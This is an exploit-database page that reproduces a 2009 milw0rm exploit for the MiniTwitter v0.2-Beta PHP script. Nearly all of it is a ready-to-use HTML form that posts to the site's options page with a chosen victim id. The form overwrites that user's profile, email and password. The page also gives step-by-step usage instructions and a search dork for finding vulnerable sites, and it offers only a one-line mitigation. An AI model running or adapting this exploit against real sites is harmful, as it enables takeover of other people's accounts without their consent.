header-logo
Suggest Exploit
vendor:
MiniTwitter v0.2-Beta
by:
5.5
CVSS
MEDIUM
CMS vulnerability
CWE
Product Name: MiniTwitter v0.2-Beta
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

USER OPTIONS CHANGER EXPLOIT

This exploit allows an attacker to change user options in MiniTwitter v0.2-Beta CMS.

Mitigation:

Upgrade to a newer version of MiniTwitter CMS.
Source

Exploit-DB raw data:

<!--
***********************************************************************************************
***********************************************************************************************
**	       										     **
**  											     **
**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
**							                                     **
**    											     **
**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
**					¡PROUD TO BE SPANISH!				     **
**											     **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|       	   	         USER OPTIONS CHANGER EXPLOIT			      	     |
|--------------------------------------------------------------------------------------------|
|                         	|    MiniTwitter v0.2-Beta     |		 	     |
|  CMS INFORMATION:		 ------------------------------			             |
|										             |
|+->WEB: http://mt.bioscriptsdb.com/          				                     |
|+->DOWNLOAD: http://sourceforge.net/projects/minitt/           	                     |
|+->DEMO: http://www.bioscripts.net/minitwitter/index.php   	     			     |
|+->CATEGORY: Social Networking								     |
|+->DESCRIPTION: Your business needs a private twitter. You can add...		       	     |
|		several twitters account and use this twitter as a buckup of all...	     |
|+->RELEASED: 2009-04-30								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|+->TESTED ON: firefox 3								     |
|+->DORK: "BioScripts"							                     |
|+->CATEGORY: OPTIONS CHANGER							             |
|+->AFFECT VERSION: <= 0.2 Beta				 			             |
|+->Discovered Bug date: 2009-04-30							     |
|+->Reported Bug date: 2009-04-30							     |
|+->Fixed bug date: 2009-05-01								     |
|+->Info patch (0.3 Beta): http://sourceforge.net/projects/minitt/  			     |
|+->Author: YEnH4ckEr									     |
|+->mail: y3nh4ck3r[at]gmail[dot]com							     |
|+->WEB/BLOG: N/A									     |
|+->COMMENT: A mi novia Marijose...hermano,cuñada, padres (y amigos xD) por su apoyo.        |
|+->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------
-->
<html>
<title>
MiniTwitter &lt;= v-0.2-Beta--by-y3nh4ck3r-->
</title>
<body bgcolor=#000000 text=#ffffff>
<font color=#ff0000>
<h1>
MiniTwitter &lt;= v-0.2-Beta--> USER OPTIONS CHANGER EXPLOIT
</h1>
</font>
<font color=#ffff00>
<H2> Instructions:<br>
1.- Register in the site.<br>
2.- Choose your configuration and id target. Use to search --> for example: http://[HOST]/[PATH]/index.php?user=1<br>
3.- [HOST]/[PATH] must be configured.<br>
</H2>
</font>
<h4><font color=#ff0000>
Notes:<br>
[#--->] You cann't change the nick, but search it! <br>
[#--->] If password is empty then change everything less password <br>
</h4></font>
<form action="path" method="post" name="register">
<h2>Configure -->[HOST]/[PATH]:</h2><input name="path" value="http://[HOST]/[PATH]/index.php?go=opt" size="120" type="text"><br>
<h2>Target -->id:</h2><input name="id_usr" value="1" size="15" type="text"><br>
<h2>Here new options:</h2>
<table border="0">
<tr><td>First Name:</td><td><input name="nombre" value="First name" size="50" type="text"><br></td></tr>
<tr><td>Second Name:</td><td><input name="apellidos" value="Second name" size="50" type="text"><br></td></tr>
<tr><td>Date:</td><td><input name="fechaanio" value="2009" size="4" type="text">-<input name="fechames" value="05" size="2" type="text">-<input name="fechadia" value="1" size="2" type="text"></td></tr>
<tr><td>Option bio:</td><td><input name="bio" value="bio" size="50" type="text"><br></td></tr>
<tr><td>Country:</td><td><input name="country" value="Spain" size="50" type="text"><br></td></tr>
<tr><td>State:</td><td><input name="state" value="Jaen" size="50" type="text"><br></td></tr>
<tr><td>Sex:</td><td><input name="sex" value="Man" size="15" type="text"><br></td></tr>
<tr><td>Option showing:</td><td><input name="showing" value="showing" size="15" type="text"><br></td></tr>
<tr><td>E-mail:</td><td><input name="correo" value="y3nh4ck3r@gmail.com" size="100" type="text"><br></td></tr>
<tr><td>Password:</td><td><input name="pass1" value="y3nh4ck3r" size="100" type="text"><br></td></tr>
<tr><td>Re-Password:</td><td><input name="pass2" value="y3nh4ck3r" size="100" type="text"><br></td></tr>
<input name="gravatar" value="111" size="3" type="hidden">
<input name="timeline" value="111" size="3" type="hidden">
</table>
<br><input name="submit" value="Change options" onclick="this.form.action=this.form.elements[0].value" type="submit">
</form>
</body>
<BR><BR>
<font color=#ff0000>
<h4>
Exploit by y3nh4ck3r. Contact: y3nh4ck3r@gmail.com
</h4>
</font>
</html>
<!--
<<+-----------------------------EOF----------------------------------+>>ENJOY IT!


#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##   GREETZ TO: JosS, Ulises2k and all SPANISH Hack3Rs community!    ##
##*******************************************************************##
#######################################################################
#######################################################################
-->

# milw0rm.com [2009-05-01]

Navigation

Suggest Exploit

Services By CQR